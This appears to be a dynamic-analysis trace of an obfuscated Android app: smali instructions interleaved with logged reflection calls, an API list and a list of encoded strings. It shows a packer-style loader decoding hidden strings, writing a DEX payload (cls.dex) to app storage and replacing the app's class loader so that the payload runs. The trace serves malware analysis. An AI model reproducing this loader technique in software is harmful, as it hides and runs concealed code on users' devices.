696new-array v0, v0, [Ljava/lang/Class;
697move-object/from16 v29, v0
699invoke-virtual/range {v27 .. v29}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
700move-result-object v27
701const/16 v28, 0x0
702move/from16 v0, v28
703new-array v0, v0, [Ljava/lang/Object;
704move-object/from16 v28, v0
705move-object/from16 v0, v27
706move-object/from16 v1, v28
708invoke-virtual {v0, v15, v1}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
709throw v26
710try_end_465: move-exception v26
711goto_466: return-void
712try_start_467:
713invoke-virtual {v15}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
714move-result-object v26
716const-string v27, "FAMeAxc="
717move-object/from16 v0, p0
718move-object/from16 v1, v27
720invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
721move-result-object v27
722const/16 v28, 0x1
723move/from16 v0, v28
724new-array v0, v0, [Ljava/lang/Class;
725move-object/from16 v28, v0
726const/16 v29, 0x0
728const-string v30, "ODM="
729move-object/from16 v0, p0
730move-object/from16 v1, v30
732invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
733move-result-object v30
735invoke-static/range {v30 .. v30}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
  • Time: 45275
    • p0: [B
    • Return:
      • class [B
      • getName: [B
736move-result-object v30
737aput-object v30, v28, v29
739invoke-virtual/range {v26 .. v28}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  • Time: 45286
    • This:
      • class java.io.FileOutputStream
      • getName:java.io.FileOutputStream
    • p0: write
    • p1: [Ljava.lang.Class;@b0547e6
    • p1.Arrays.toString: [class [B]
    • Return:
      • public void java.io.OutputStream.write(byte[]) throws java.io.IOException
      • getName: write
740move-result-object v26
741const/16 v27, 0x1
742move/from16 v0, v27
743new-array v0, v0, [Ljava/lang/Object;
744move-object/from16 v27, v0
745const/16 v28, 0x0
746aput-object v10, v27, v28
747move-object/from16 v0, v26
748move-object/from16 v1, v27
750invoke-virtual {v0, v15, v1}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Reflective invoke: java.io.FileOutputStream.write
    • This:
      • java.io.FileOutputStream@2895bb2f
    • p0: [B@2ecbe6d1
    • p0: dex035K>h/_#8.<pxV4lpKZ\^\LMP259SmsKG#25;>AEXjx(8BU^k ),FIT_kw#7G\ox/>HO
    • p0: 6465780A303335000A4B043E0DF468862F5F23CDF29038EA2EB301C4A50E01063C920600700000007856341200000000000000006C910600E31200007000000088030000FC4B0000F00400001C5A0000A00700005C9500005E0F00005CD20000150200004C4D010050020500EC8F0100EC8F0100EE8F0100F18F0100F48F0100F88F010014900100329001003590010039900100539001006D90010073900100929001009F900100AC900100C2900100D5900100EA900100019101004B910100899101009C910100A7910100B3910100C2910100CC910100D9910100E9910100F8910100FF91010047920100859201008E920100959201009D920100A2920100A7920100AC920100B5920100BF920100CC920100D3920100D6920100D99201002393010032930100359301003B9301003E9301004193010045930100589301006A930100789301008B9301009E930100B2930100BE930100D3930100E8930100F79301000394010013940100289401003894010042940100559401005E9401006B9401008694010094940100A9940100B7940100D0940100E9940100FC9401001795010020950100299501002C9501004695010049950100549501005F9501006B9501007795010083950100909501009D950100AA950100B8950100C6950100CC950100D1950100DA950100E0950100EB950100F1950100F8950100FE950100
    • Return:
      • null
  • Time: 45299
    • This:
      • public void java.io.OutputStream.write(byte[]) throws java.io.IOException
      • getName:write
    • p0: java.io.FileOutputStream@2895bb2f
    • p1: [Ljava.lang.Object;@11d2efd4
    • p1.Arrays.toString: [[B@2ecbe6d1]
    • Return:
      • null
751try_end_4a6:
752invoke-virtual {v15}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
753move-result-object v26
755const-string v27, "AB0YBBc="
756move-object/from16 v0, p0
757move-object/from16 v1, v27
759invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
760move-result-object v27
761const/16 v28, 0x0
762move/from16 v0, v28
763new-array v0, v0, [Ljava/lang/Class;
764move-object/from16 v28, v0
766invoke-virtual/range {v26 .. v28}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  • Time: 45316
    • This:
      • class java.io.FileOutputStream
      • getName:java.io.FileOutputStream
    • p0: close
    • p1: [Ljava.lang.Class;@21593540
    • Return:
      • public void java.io.FileOutputStream.close() throws java.io.IOException
      • getName: close
767move-result-object v26
768const/16 v27, 0x0
769move/from16 v0, v27
770new-array v0, v0, [Ljava/lang/Object;
771move-object/from16 v27, v0
772move-object/from16 v0, v26
773move-object/from16 v1, v27
775invoke-virtual {v0, v15, v1}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Reflective invoke: java.io.FileOutputStream.close
    • This:
      • java.io.FileOutputStream@2895bb2f
    • Return:
      • null
  • Time: 45320
    • This:
      • public void java.io.FileOutputStream.close() throws java.io.IOException
      • getName:close
    • p0: java.io.FileOutputStream@2895bb2f
    • p1: [Ljava.lang.Object;@1dfb6dbe
    • Return:
      • null
776goto/16 :goto_41b
777catchall_4d1: move-exception v26
779invoke-virtual {v15}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
780move-result-object v27
782const-string v28, "AB0YBBc="
783move-object/from16 v0, p0
784move-object/from16 v1, v28
786invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
787move-result-object v28
788const/16 v29, 0x0
789move/from16 v0, v29
790new-array v0, v0, [Ljava/lang/Class;
791move-object/from16 v29, v0
793invoke-virtual/range {v27 .. v29}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
794move-result-object v27
795const/16 v28, 0x0
796move/from16 v0, v28
797new-array v0, v0, [Ljava/lang/Object;
798move-object/from16 v28, v0
799move-object/from16 v0, v27
800move-object/from16 v1, v28
802invoke-virtual {v0, v15, v1}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
803throw v26
804catch_4fc: move-exception v12
806invoke-virtual {v9}, Ljava/lang/Class;->getSuperclass()Ljava/lang/Class;
807move-result-object v9
808goto/16 :goto_41d
809cond_503: const/16 v26, 0x1
810move/from16 v0, v26
812invoke-virtual {v5, v0}, Ljava/lang/reflect/Field;->setAccessible(Z)V
814invoke-virtual/range {v25 .. v25}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
815move-result-object v26
817const-string v27, "BBQDNhAEBA8EAxIiFh8L"
818move-object/from16 v0, p0
819move-object/from16 v1, v27
821invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
822move-result-object v27
823const/16 v28, 0x0
824move/from16 v0, v28
825new-array v0, v0, [Ljava/lang/Class;
826move-object/from16 v28, v0
828invoke-virtual/range {v26 .. v28}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  • Time: 45376
    • This:
      • class java.io.File
      • getName:java.io.File
    • p0: getAbsolutePath
    • p1: [Ljava.lang.Class;@3c4808b3
    • Return:
      • public java.lang.String java.io.File.getAbsolutePath()
      • getName: getAbsolutePath
829move-result-object v26
830const/16 v27, 0x0
831move/from16 v0, v27
832new-array v0, v0, [Ljava/lang/Object;
833move-object/from16 v27, v0
834move-object/from16 v0, v26
835move-object/from16 v1, v25
836move-object/from16 v2, v27
838invoke-virtual {v0, v1, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Reflective invoke: java.io.File.getAbsolutePath
    • This:
      • /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
    • Return:
      • /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
  • Time: 45380
    • This:
      • public java.lang.String java.io.File.getAbsolutePath()
      • getName:getAbsolutePath
    • p0: /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
    • p1: [Ljava.lang.Object;@9e955e9
    • Return:
      • /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
839move-result-object v26
841invoke-virtual/range {v25 .. v25}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
842move-result-object v27
844const-string v28, "BBQDJxMFDg0FMR4eEg=="
845move-object/from16 v0, p0
846move-object/from16 v1, v28
848invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
849move-result-object v28
850const/16 v29, 0x0
851move/from16 v0, v29
852new-array v0, v0, [Ljava/lang/Class;
853move-object/from16 v29, v0
855invoke-virtual/range {v27 .. v29}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  • Time: 45397
    • This:
      • class java.io.File
      • getName:java.io.File
    • p0: getParentFile
    • p1: [Ljava.lang.Class;@21f867a5
    • Return:
      • public java.io.File java.io.File.getParentFile()
      • getName: getParentFile
856move-result-object v27
857const/16 v28, 0x0
858move/from16 v0, v28
859new-array v0, v0, [Ljava/lang/Object;
860move-object/from16 v28, v0
861move-object/from16 v0, v27
862move-object/from16 v1, v25
863move-object/from16 v2, v28
865invoke-virtual {v0, v1, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Reflective invoke: java.io.File.getParentFile
    • This:
      • /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
    • Return:
      • /data/data/com.czybg.eqtbdmzpklrgyns/files
  • Time: 45416
    • This:
      • public java.io.File java.io.File.getParentFile()
      • getName:getParentFile
    • p0: /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
    • p1: [Ljava.lang.Object;@1181db2b
    • Return:
      • /data/data/com.czybg.eqtbdmzpklrgyns/files
866move-result-object v27
868invoke-virtual/range {v27 .. v27}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
869move-result-object v27
871const-string v28, "BBQDJxMFDg0F"
872move-object/from16 v0, p0
873move-object/from16 v1, v28
875invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
876move-result-object v28
877const/16 v29, 0x0
878move/from16 v0, v29
879new-array v0, v0, [Ljava/lang/Class;
880move-object/from16 v29, v0
882invoke-virtual/range {v27 .. v29}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  • Time: 45440
    • This:
      • class java.io.File
      • getName:java.io.File
    • p0: getParent
    • p1: [Ljava.lang.Class;@e4ae834
    • Return:
      • public java.lang.String java.io.File.getParent()
      • getName: getParent
883move-result-object v27
885invoke-virtual/range {v25 .. v25}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
886move-result-object v28
888const-string v29, "BBQDJxMFDg0FMR4eEg=="
889move-object/from16 v0, p0
890move-object/from16 v1, v29
892invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
893move-result-object v29
894const/16 v30, 0x0
895move/from16 v0, v30
896new-array v0, v0, [Ljava/lang/Class;
897move-object/from16 v30, v0
899invoke-virtual/range {v28 .. v30}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  • Time: 45466
    • This:
      • class java.io.File
      • getName:java.io.File
    • p0: getParentFile
    • p1: [Ljava.lang.Class;@b868b59
    • Return:
      • public java.io.File java.io.File.getParentFile()
      • getName: getParentFile
900move-result-object v28
901const/16 v29, 0x0
902move/from16 v0, v29
903new-array v0, v0, [Ljava/lang/Object;
904move-object/from16 v29, v0
905move-object/from16 v0, v28
906move-object/from16 v1, v25
907move-object/from16 v2, v29
909invoke-virtual {v0, v1, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Reflective invoke: java.io.File.getParentFile
    • This:
      • /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
    • Return:
      • /data/data/com.czybg.eqtbdmzpklrgyns/files
  • Time: 45485
    • This:
      • public java.io.File java.io.File.getParentFile()
      • getName:getParentFile
    • p0: /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
    • p1: [Ljava.lang.Object;@1e30c7ff
    • Return:
      • /data/data/com.czybg.eqtbdmzpklrgyns/files
910move-result-object v28
911const/16 v29, 0x0
912move/from16 v0, v29
913new-array v0, v0, [Ljava/lang/Object;
914move-object/from16 v29, v0
916invoke-virtual/range {v27 .. v29}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Reflective invoke: java.io.File.getParent
    • This:
      • /data/data/com.czybg.eqtbdmzpklrgyns/files
    • Return:
      • /data/data/com.czybg.eqtbdmzpklrgyns
  • Time: 45500
    • This:
      • public java.lang.String java.io.File.getParent()
      • getName:getParent
    • p0: /data/data/com.czybg.eqtbdmzpklrgyns/files
    • p1: [Ljava.lang.Object;@1b8b8415
    • Return:
      • /data/data/com.czybg.eqtbdmzpklrgyns
917move-result-object v27
918const/16 v28, 0x0
920invoke-virtual/range {p0 .. p0}, Letxtfvw/cqwwrwk;->getClassLoader()Ljava/lang/ClassLoader;
921move-result-object v29
922move-object/from16 v0, p0
923move-object/from16 v1, v26
924move-object/from16 v2, v27
925move-object/from16 v3, v28
926move-object/from16 v4, v29
928invoke-direct {v0, v1, v2, v3, v4}, Letxtfvw/cqwwrwk;->uxONpX(Ljava/lang/Object;Ljava/lang/Object;Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
929move-result-object v11
931invoke-virtual/range {p0 .. p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
932move-result-object v26
934invoke-virtual/range {v26 .. v26}, Ljava/lang/Class;->getSuperclass()Ljava/lang/Class;
935move-result-object v26
937invoke-virtual/range {v26 .. v26}, Ljava/lang/Class;->getSuperclass()Ljava/lang/Class;
938move-result-object v26
940const-string v27, "mBase"
942invoke-virtual/range {v26 .. v27}, Ljava/lang/Class;->getDeclaredField(Ljava/lang/String;)Ljava/lang/reflect/Field;
  • Time: 55777
    • This:
      • class android.content.ContextWrapper
      • getName:android.content.ContextWrapper
    • p0: mBase
    • Return:
      • android.content.Context android.content.ContextWrapper.mBase
      • getName: mBase
943move-result-object v17
944const/16 v26, 0x1
945move-object/from16 v0, v17
946move/from16 v1, v26
948invoke-virtual {v0, v1}, Ljava/lang/reflect/Field;->setAccessible(Z)V
949move-object/from16 v0, v17
950move-object/from16 v1, p0
952invoke-virtual {v0, v1}, Ljava/lang/reflect/Field;->get(Ljava/lang/Object;)Ljava/lang/Object;
  • Time: 55779
    • This:
      • android.content.Context android.content.ContextWrapper.mBase
      • getName:mBase
    • p0: etxtfvw.cqwwrwk@32c17d93
    • Return:
      • android.app.ContextImpl@2d30d73d
953move-result-object v6
955invoke-virtual {v6}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
956move-result-object v26
958const-string v27, "mMainThread"
960invoke-virtual/range {v26 .. v27}, Ljava/lang/Class;->getDeclaredField(Ljava/lang/String;)Ljava/lang/reflect/Field;
  • Time: 55782
    • This:
      • class android.app.ContextImpl
      • getName:android.app.ContextImpl
    • p0: mMainThread
    • Return:
      • final android.app.ActivityThread android.app.ContextImpl.mMainThread
      • getName: mMainThread
961move-result-object v24
962const/16 v26, 0x1
963move-object/from16 v0, v24
964move/from16 v1, v26
966invoke-virtual {v0, v1}, Ljava/lang/reflect/Field;->setAccessible(Z)V
967move-object/from16 v0, v24
969invoke-virtual {v0, v6}, Ljava/lang/reflect/Field;->get(Ljava/lang/Object;)Ljava/lang/Object;
  • Time: 55785
    • This:
      • final android.app.ActivityThread android.app.ContextImpl.mMainThread
      • getName:mMainThread
    • p0: android.app.ContextImpl@2d30d73d
    • Return:
      • android.app.ActivityThread@12d8aa39
970move-result-object v23
972invoke-virtual/range {v23 .. v23}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
973move-result-object v26
975const-string v27, "mPackages"
977invoke-virtual/range {v26 .. v27}, Ljava/lang/Class;->getDeclaredField(Ljava/lang/String;)Ljava/lang/reflect/Field;
  • Time: 55789
    • This:
      • class android.app.ActivityThread
      • getName:android.app.ActivityThread
    • p0: mPackages
    • Return:
      • final android.util.ArrayMap android.app.ActivityThread.mPackages
      • getName: mPackages
978move-result-object v21
979const/16 v26, 0x1
980move-object/from16 v0, v21
981move/from16 v1, v26
983invoke-virtual {v0, v1}, Ljava/lang/reflect/Field;->setAccessible(Z)V
984move-object/from16 v0, v21
985move-object/from16 v1, v23
987invoke-virtual {v0, v1}, Ljava/lang/reflect/Field;->get(Ljava/lang/Object;)Ljava/lang/Object;
  • Time: 55793
    • This:
      • final android.util.ArrayMap android.app.ActivityThread.mPackages
      • getName:mPackages
    • p0: android.app.ActivityThread@12d8aa39
    • Return:
      • {com.czybg.eqtbdmzpklrgyns=java.lang.ref.WeakReference@1c042e8a}
988move-result-object v19
989check-cast v19, Ljava/util/Map;
991invoke-virtual/range {p0 .. p0}, Letxtfvw/cqwwrwk;->getPackageName()Ljava/lang/String;
  • Time: 55797
    • This:
      • etxtfvw.cqwwrwk@32c17d93
    • Return:
      • com.czybg.eqtbdmzpklrgyns
992move-result-object v26
993move-object/from16 v0, v19
994move-object/from16 v1, v26
996invoke-interface {v0, v1}, Ljava/util/Map;->get(Ljava/lang/Object;)Ljava/lang/Object;
997move-result-object v22
998check-cast v22, Ljava/lang/ref/WeakReference;
1000invoke-virtual/range {v22 .. v22}, Ljava/lang/ref/WeakReference;->get()Ljava/lang/Object;
1001move-result-object v7
1003invoke-virtual {v7}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
1004move-result-object v8
1006const-string v26, "mClassLoader"
1007move-object/from16 v0, v26
1009invoke-virtual {v8, v0}, Ljava/lang/Class;->getDeclaredField(Ljava/lang/String;)Ljava/lang/reflect/Field;
  • Time: 55800
    • This:
      • class android.app.LoadedApk
      • getName:android.app.LoadedApk
    • p0: mClassLoader
    • Return:
      • private java.lang.ClassLoader android.app.LoadedApk.mClassLoader
      • getName: mClassLoader
1010move-result-object v18
1011const/16 v26, 0x1
1012move-object/from16 v0, v18
1013move/from16 v1, v26
1015invoke-virtual {v0, v1}, Ljava/lang/reflect/Field;->setAccessible(Z)V
1016move-object/from16 v0, v18
1018invoke-virtual {v0, v7, v11}, Ljava/lang/reflect/Field;->set(Ljava/lang/Object;Ljava/lang/Object;)V
  • Time: 55804
    • This:
      • private java.lang.ClassLoader android.app.LoadedApk.mClassLoader
      • getName:mClassLoader
    • p0: android.app.LoadedApk@28fea956
    • p1: dalvik.system.DexClassLoader[DexPathList[[dex file "/data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex"],nativeLibraryDirectories=[/vendor/lib, /system/lib]]]
1019try_end_64d: goto/16 :goto_466
APIs
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.getMethod
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.forName
  • java.lang.Class.getMethod
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.getMethod
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.getMethod
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.forName
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.getField
  • java.lang.reflect.Field.get
  • android.content.pm.PackageManager.getPackageInfo
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.getField
  • java.lang.reflect.Field.get
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.getMethod
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.forName
  • java.lang.Class.getDeclaredMethod
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.forName
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.forName
  • java.lang.Class.getDeclaredMethod
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.forName
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.forName
  • java.lang.Class.getMethod
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.forName
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.getField
  • java.lang.reflect.Field.get
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.getMethod
  • java.lang.reflect.Method.invoke
Strings
  • BBQDJxMUAAIWEjoTGQoEFAU=
  • BBQDJxMUAAIWEj4cEQQ=
  • CRABFlwbCg0WWSQGBQINFg==
  • BBQDJxMUAAIWEjkTGg4=
  • com.czybg.eqtbdmzpklrgyns
  • Ah8TBR0eD00SGBkGEgUXXwcaXCcKABoWEBc6Cg0QEBIA
  • JDQjKCE+LC0wIyIgMjg=
  • EBgQGRMDHhEUBA==
  • Fx41DgYSKhEDFg4=
  • ISM4Bhw4MxQ3PCAcIAg=
  • ODM=
  • 6f0b4c2ebdf76da41b9c70ab26e8851e
  • DDU4HgohOBM5OhgHBQ==
  • Ah8TBR0eD00EAx4eWSkCAhJBRg==
  • BxQUGBYS
  • JzQxNic7Pw==
  • BBQDNQsDDhA=
Position Instruction Meta Information
0.param p1, "s" # [B
1.prologue
2try_start_0:
3invoke-virtual {p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
4move-result-object v6
6const-string v7, "BBQDJxMUAAIWEjoTGQoEFAU="
8invoke-virtual {p0, v7}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
9move-result-object v7
10const/4 v8, 0x0
11new-array v8, v8, [Ljava/lang/Class;
13invoke-virtual {v6, v7, v8}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
14move-result-object v6
15const/4 v7, 0x0
16new-array v7, v7, [Ljava/lang/Object;
18invoke-virtual {v6, p0, v7}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Time: 44328
    • This:
      • public android.content.pm.PackageManager android.content.ContextWrapper.getPackageManager()
      • getName:getPackageManager
    • p0: etxtfvw.cqwwrwk@32c17d93
    • p1: [Ljava.lang.Object;@25c7ada1
    • Return:
      • android.app.ApplicationPackageManager@18722bc6
19move-result-object v6
21invoke-virtual {v6}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
22move-result-object v6
24const-string v7, "BBQDJxMUAAIWEj4cEQQ="
26invoke-virtual {p0, v7}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
27move-result-object v7
28const/4 v8, 0x2
29new-array v8, v8, [Ljava/lang/Class;
30const/4 v9, 0x0
32const-string v10, "CRABFlwbCg0WWSQGBQINFg=="
34invoke-virtual {p0, v10}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
35move-result-object v10
37invoke-static {v10}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
38move-result-object v10
39aput-object v10, v8, v9
40const/4 v9, 0x1
42sget-object v10, Ljava/lang/Integer;->TYPE:Ljava/lang/Class;
43aput-object v10, v8, v9
45invoke-virtual {v6, v7, v8}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
46move-result-object v6
48invoke-virtual {p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
49move-result-object v7
51const-string v8, "BBQDJxMUAAIWEjoTGQoEFAU="
53invoke-virtual {p0, v8}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
54move-result-object v8
55const/4 v9, 0x0
56new-array v9, v9, [Ljava/lang/Class;
58invoke-virtual {v7, v8, v9}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
59move-result-object v7
60const/4 v8, 0x0
61new-array v8, v8, [Ljava/lang/Object;
63invoke-virtual {v7, p0, v8}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Time: 44386
    • This:
      • public android.content.pm.PackageManager android.content.ContextWrapper.getPackageManager()
      • getName:getPackageManager
    • p0: etxtfvw.cqwwrwk@32c17d93
    • p1: [Ljava.lang.Object;@be4ed9e
    • Return:
      • android.app.ApplicationPackageManager@18722bc6
64move-result-object v7
65const/4 v8, 0x2
66new-array v8, v8, [Ljava/lang/Object;
67const/4 v9, 0x0
69invoke-virtual {p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
70move-result-object v10
72const-string v11, "BBQDJxMUAAIWEjkTGg4="
74invoke-virtual {p0, v11}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
75move-result-object v11
76const/4 v12, 0x0
77new-array v12, v12, [Ljava/lang/Class;
79invoke-virtual {v10, v11, v12}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
80move-result-object v10
81const/4 v11, 0x0
82new-array v11, v11, [Ljava/lang/Object;
84invoke-virtual {v10, p0, v11}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Time: 44403
    • This:
      • public java.lang.String android.content.ContextWrapper.getPackageName()
      • getName:getPackageName
    • p0: etxtfvw.cqwwrwk@32c17d93
    • p1: [Ljava.lang.Object;@282e45aa
    • Return:
      • com.czybg.eqtbdmzpklrgyns
85move-result-object v10
86aput-object v10, v8, v9
87const/4 v9, 0x1
89const-string v10, "Ah8TBR0eD00SGBkGEgUXXwcaXCcKABoWEBc6Cg0QEBIA"
91invoke-virtual {p0, v10}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
92move-result-object v10
94invoke-static {v10}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
95move-result-object v10
97const-string v11, "JDQjKCE+LC0wIyIgMjg="
99invoke-virtual {p0, v11}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
100move-result-object v11
102invoke-virtual {v10, v11}, Ljava/lang/Class;->getField(Ljava/lang/String;)Ljava/lang/reflect/Field;
103move-result-object v10
104const/4 v11, 0x0
106invoke-virtual {v10, v11}, Ljava/lang/reflect/Field;->get(Ljava/lang/Object;)Ljava/lang/Object;
107move-result-object v10
108aput-object v10, v8, v9
110invoke-virtual {v6, v7, v8}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Time: 44444
    • This:
      • android.app.ApplicationPackageManager@18722bc6
    • packageName: com.czybg.eqtbdmzpklrgyns
    • flags: 64
    • Return:
      • PackageInfo{29f81468 com.czybg.eqtbdmzpklrgyns}
  • Time: 44454
    • This:
      • public android.content.pm.PackageInfo android.app.ApplicationPackageManager.getPackageInfo(java.lang.String,int) throws android.content.pm.PackageManager$NameNotFoundException
      • getName:getPackageInfo
    • p0: android.app.ApplicationPackageManager@18722bc6
    • p1: [Ljava.lang.Object;@b30526
    • p1.Arrays.toString: [com.czybg.eqtbdmzpklrgyns, 64]
    • Return:
      • PackageInfo{29f81468 com.czybg.eqtbdmzpklrgyns}
111move-result-object v4
113invoke-virtual {v4}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
114move-result-object v6
116const-string v7, "EBgQGRMDHhEUBA=="
118invoke-virtual {p0, v7}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
119move-result-object v7
121invoke-virtual {v6, v7}, Ljava/lang/Class;->getField(Ljava/lang/String;)Ljava/lang/reflect/Field;
122move-result-object v6
124invoke-virtual {v6, v4}, Ljava/lang/reflect/Field;->get(Ljava/lang/Object;)Ljava/lang/Object;
125move-result-object v6
126check-cast v6, [Ljava/lang/Object;
127move-object v0, v6
128check-cast v0, [Ljava/lang/Object;
129move-object v1, v0
130array-length v6, v1
131const/4 v7, 0x0
132if-ge v7, v6, :cond_19b
133aget-object v2, v1, v7
135invoke-virtual {v2}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
136move-result-object v6
138const-string v7, "Fx41DgYSKhEDFg4="
140invoke-virtual {p0, v7}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
141move-result-object v7
142const/4 v8, 0x0
143new-array v8, v8, [Ljava/lang/Class;
145invoke-virtual {v6, v7, v8}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
146move-result-object v6
147const/4 v7, 0x0
148new-array v7, v7, [Ljava/lang/Object;
